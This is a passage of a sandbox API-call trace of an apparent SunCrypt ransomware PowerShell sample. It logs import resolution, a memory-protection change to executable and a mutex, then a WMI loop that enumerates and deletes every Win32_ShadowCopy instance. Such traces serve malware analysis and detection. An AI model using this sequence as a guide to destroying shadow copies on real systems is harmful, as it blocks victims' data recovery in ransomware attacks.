lpProcName="HeapAlloc") returned 0x77722dd6 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="HeapFree") returned 0x7608c4c0 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="GetProcessHeap") returned 0x7608fddd [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="GetQueuedCompletionStatus") returned 0x76074f98 [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="Sleep") returned 0x7608c366 [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="WriteFile") returned 0x760954fe [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="ReadFile") returned 0x76089cbe [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="CloseHandle") returned 0x7608e96c [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="lstrcatW") returned 0x760a67ec [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetProcAddress") returned 0x7608cd94 [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetFileType") returned 0x76096bc4 [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetStdHandle") returned 0x76098fa7 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="LoadLibraryA") returned 0x7608dd65 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="MultiByteToWideChar") returned 0x7608f007 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="WideCharToMultiByte") returned 0x7608effa [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="FillConsoleOutputCharacterA") returned 0x760edcdb [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="FillConsoleOutputAttribute") returned 0x760a26f0 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="GetConsoleMode") returned 0x7609c240 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76089c08 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleScreenBufferSize") returned 0x760ee820 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleCursorPosition") returned 0x76071edc [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleTextAttribute") returned 0x760a2685 [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="lstrcpyW") returned 0x7607921f [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="AttachConsole") returned 0x760eccfb [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="WriteConsoleW") returned 0x7608868d [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="GetConsoleOutputCP") returned 0x760951ab [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="CreateThread") returned 0x7608ddc2 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="CreateIoCompletionPort") returned 0x76078fe1 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="PostQueuedCompletionStatus") returned 0x76074fb0 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="GetLogicalDrives") returned 0x760855a6 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="GetFileSizeEx") returned 0x76089b09 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="FindClose") returned 0x76094d34 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="lstrcmpW") returned 0x76095431 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="GetSystemInfo") returned 0x7608ddb2 [0106.841] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x766e0000 [0106.842] GetProcAddress (hModule=0x766e0000, lpProcName="wsprintfW") returned 0x7670426d [0106.842] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76130000 [0106.842] GetProcAddress (hModule=0x76130000, lpProcName="GetUserNameA") returned 0x7615a4b4 [0106.842] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a80000 [0106.843] GetProcAddress (hModule=0x76a80000, lpProcName="CommandLineToArgvW") returned 0x76a99ee8 [0106.843] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76480000 [0106.843] GetProcAddress (hModule=0x76480000, lpProcName="CoInitialize") returned 0x7649b636 [0106.843] GetProcAddress (hModule=0x76480000, lpProcName="CoCreateInstance") returned 0x764c9d0b [0106.844] GetProcAddress (hModule=0x76480000, lpProcName="CoSetProxyBlanket") returned 0x76495ea5 [0106.844] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769c0000 [0106.844] GetProcAddress (hModule=0x76040000, lpProcName="VirtualProtect") returned 0x76082d25 [0106.844] VirtualProtect (in: lpAddress=0x44f0000, dwSize=0x14000, flNewProtect=0x40, lpflOldProtect=0x4ebed64 | out: lpflOldProtect=0x4ebed64*=0x4) returned 1 [0106.847] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776d0000 [0106.847] GetProcAddress (hModule=0x776d0000, lpProcName="strncpy") returned 0x77705790 [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="_atoi64") returned 0x776d605a [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="atoi") returned 0x776d9d0d [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="isxdigit") returned 0x776e35f3 [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="isdigit") returned 0x776e33fb [0106.849] GetProcAddress (hModule=0x776d0000, lpProcName="memset") returned 0x77705340 [0106.849] GetProcAddress (hModule=0x776d0000, lpProcName="memcpy") returned 0x77704cc0 [0106.851] GetProcAddress (hModule=0x776d0000, lpProcName="NtSetInformationFile") returned 0x77716638 [0106.851] GetProcAddress (hModule=0x776d0000, lpProcName="NtQueryObject") returned 0x77716128 [0106.851] GetCommandLineW () returned="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" " [0106.851] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" ", pNumArgs=0x4ebebac | out: pNumArgs=0x4ebebac) returned 0x4267198*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" [0106.851] LocalFree (hMem=0x4267198) returned 0x0 [0106.852] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x776d0000 [0106.852] GetProcAddress (hModule=0x776d0000, lpProcName="RtlGetVersion") returned 0x777365e3 [0106.852] RtlGetVersion (in: lpVersionInformation=0x4501de8 | out: lpVersionInformation=0x4501de8*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0106.852] GetSystemInfo (in: lpSystemInfo=0x4ebeb18 | out: lpSystemInfo=0x4ebeb18*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0106.852] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="rrtu(t(%%%( !$p#!%#$s%tr w#w\"(! % '(&#&# t&& (u'r)&)t# !!u#(#u'p 'u$ (twrtw!%$#\x11") returned 0x4f8 [0106.852] GetLastError () returned 0x0 [0106.854] CoInitialize (pvReserved=0x0) returned 0x1 [0106.854] CoCreateInstance (in: rclsid=0x44fcf60*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x44fcec0*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x4ebea4c | out: ppv=0x4ebea4c*=0x316718) returned 0x0 [0107.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76040000 [0107.850] GetProcAddress (hModule=0x76040000, lpProcName="IsWow64Process") returned 0x76085586 [0107.850] GetCurrentProcess () returned 0xffffffff [0107.850] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x4ebea30 | out: Wow64Process=0x4ebea30*=0) returned 1 [0107.850] CoCreateInstance (in: rclsid=0x44fcf50*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x44fce80*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x4ebea24 | out: ppv=0x4ebea24*=0x42907c0) returned 0x0 [0107.994] WbemLocator:IWbemLocator:ConnectServer (in: This=0x42907c0, strNetworkResource="ROOT\\cimv", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x316718, ppNamespace=0x4ebea50 | out: ppNamespace=0x4ebea50*=0x4271938) returned 0x0 [0108.633] CoSetProxyBlanket (pProxy=0x4271938, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.633] IWbemServices:ExecQuery (in: This=0x4271938, strQueryLanguage="WQL", strQuery="select * from Win32_ShadowCopy", lFlags=48, pCtx=0x0, ppEnum=0x4ebea2c | out: ppEnum=0x4ebea2c*=0x309a58) returned 0x0 [0108.638] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4d80, puReturned=0x4ebea68*=0x1) returned 0x0 [0111.027] IWbemClassObject:Get (in: This=0x42f4d80, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x4f30, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x4ebea14, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{37C0159D-29DA-4DA2-9244-8546939ADEE0}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0111.027] lstrlenW (lpString="{37C0159D-29DA-4DA2-9244-8546939ADEE0}") returned 38 [0111.027] GetProcessHeap () returned 0x270000 [0111.027] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0111.027] lstrlenW (lpString="{37C0159D-29DA-4DA2-9244-8546939ADEE0}") returned 38 [0111.027] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{37C0159D-29DA-4DA2-9244-8546939ADEE0}'") returned 60 [0111.028] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{37C0159D-29DA-4DA2-9244-8546939ADEE0}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0114.172] GetProcessHeap () returned 0x270000 [0114.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0114.172] IUnknown:Release (This=0x42f4d80) returned 0x0 [0114.173] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0114.176] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x427092c, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0114.176] lstrlenW (lpString="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}") returned 38 [0114.176] GetProcessHeap () returned 0x270000 [0114.176] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0114.176] lstrlenW (lpString="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}") returned 38 [0114.176] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}'") returned 60 [0114.176] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0117.232] GetProcessHeap () returned 0x270000 [0117.233] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0117.233] IUnknown:Release (This=0x42f4268) returned 0x0 [0117.233] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0117.234] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0117.234] lstrlenW (lpString="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}") returned 38 [0117.234] GetProcessHeap () returned 0x270000 [0117.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0117.234] lstrlenW (lpString="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}") returned 38 [0117.235] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}'") returned 60 [0117.235] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0120.256] GetProcessHeap () returned 0x270000 [0120.256] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0120.256] IUnknown:Release (This=0x42f4268) returned 0x0 [0120.257] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0120.259] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{E6030CDE-F426-4EB9-A0D4-67502C04B952}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0120.259] lstrlenW (lpString="{E6030CDE-F426-4EB9-A0D4-67502C04B952}") returned 38 [0120.259] GetProcessHeap () returned 0x270000 [0120.259] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0120.259] lstrlenW (lpString="{E6030CDE-F426-4EB9-A0D4-67502C04B952}") returned 38 [0120.259] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E6030CDE-F426-4EB9-A0D4-67502C04B952}'") returned 60 [0120.259] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{E6030CDE-F426-4EB9-A0D4-67502C04B952}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0123.299] GetProcessHeap () returned 0x270000 [0123.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0123.299] IUnknown:Release (This=0x42f4268) returned 0x0 [0123.300] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x335808, puReturned=0x4ebea68*=0x1) returned 0x0 [0123.302] IWbemClassObject:Get (in: This=0x335808, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0123.302] lstrlenW (lpString="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}") returned 38 [0123.302] GetProcessHeap () returned 0x270000 [0123.302] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0123.303] lstrlenW (lpString="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}") returned 38 [0123.303] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AE1F5B37-D72C-40EC-8909-1366E23B77A6}'") returned 60 [0123.303] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{AE1F5B37-D72C-40EC-8909-1366E23B77A6}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0125.538] GetProcessHeap () returned 0x270000 [0125.539] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0125.539] IUnknown:Release (This=0x335808) returned 0x0 [0125.539] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x335808, puReturned=0x4ebea68*=0x1) returned 0x0 [0125.540] IWbemClassObject:Get (in: This=0x335808, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0125.540] lstrlenW (lpString="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}") returned 38 [0125.540] GetProcessHeap () returned 0x270000 [0125.540] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0125.540] lstrlenW (lpString="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}") returned 38 [0125.540] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}'") returned 60 [0125.541] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0128.252] GetProcessHeap () returned 0x270000 [0128.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0128.252] IUnknown:Release (This=0x335808) returned 0x0 [0128.252] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0128.254] IWbemClassObject:Get (in: This=0x318780, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0128.254] lstrlenW (lpString="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}") returned 38 [0128.254] GetProcessHeap () returned 0x270000 [0128.254] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0128.255] lstrlenW (lpString="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}") returned 38 [0128.255] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}'") returned 60 [0128.255] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.441] GetProcessHeap () returned 0x270000 [0130.442] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0130.442] IUnknown:Release (This=0x318780) returned 0x0 [0130.442] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0130.443] IWbemClassObject:Get (in: This=0x318780, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0130.444] lstrlenW (lpString="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}") returned 38 [0130.444] GetProcessHeap () returned 0x270000 [0130.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0130.444] lstrlenW (lpString="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}") returned 38 [0130.444] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{5E8A808F-BD17-4BF1-9452-FE34D967D19F}'") returned 60 [0130.444] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{5E8A808F-BD17-4BF1-9452-FE34D967D19F}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0132.426] GetProcessHeap () returned 0x270000 [0132.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0132.427] IUnknown:Release (This=0x318780) returned 0x0 [0132.427] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0132.429] IWbemClassObject:Get (in: This=0x318780, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{C446F22D-39D8-4005-8814-B78EDB2DE869}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0132.429] lstrlenW (lpString="{C446F22D-39D8-4005-8814-B78EDB2DE869}") returned 38 [0132.429] GetProcessHeap () returned 0x270000 [0132.429] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0132.429] lstrlenW (lpString="{C446F22D-39D8-4005-8814-B78EDB2DE869}") returned 38 [0132.429] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{C446F22D-39D8-4005-8814-B78EDB2DE869}'") returned 60 [0132.429] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{C446F22D-39D8-4005-8814-B78EDB2DE869}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0134.612] GetProcessHeap () returned 0x270000 [0134.612] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0134.612] IUnknown:Release (This=0x318780) returned 0x0 [0134.612] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0134.614] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0134.614] lstrlenW (lpString="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}") returned 38 [0134.614] GetProcessHeap () returned 0x270000 [0134.614] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0134.614] lstrlenW (lpString="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}") returned 38 [0134.614] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}'") returned 60 [0134.614] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0136.727] GetProcessHeap () returned 0x270000 [0136.728] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0136.728] IUnknown:Release (This=0x2e7f50) returned 0x0 [0136.728] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0136.731] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0136.731] lstrlenW (lpString="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}") returned 38 [0136.731] GetProcessHeap () returned 0x270000 [0136.731] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0136.731] lstrlenW 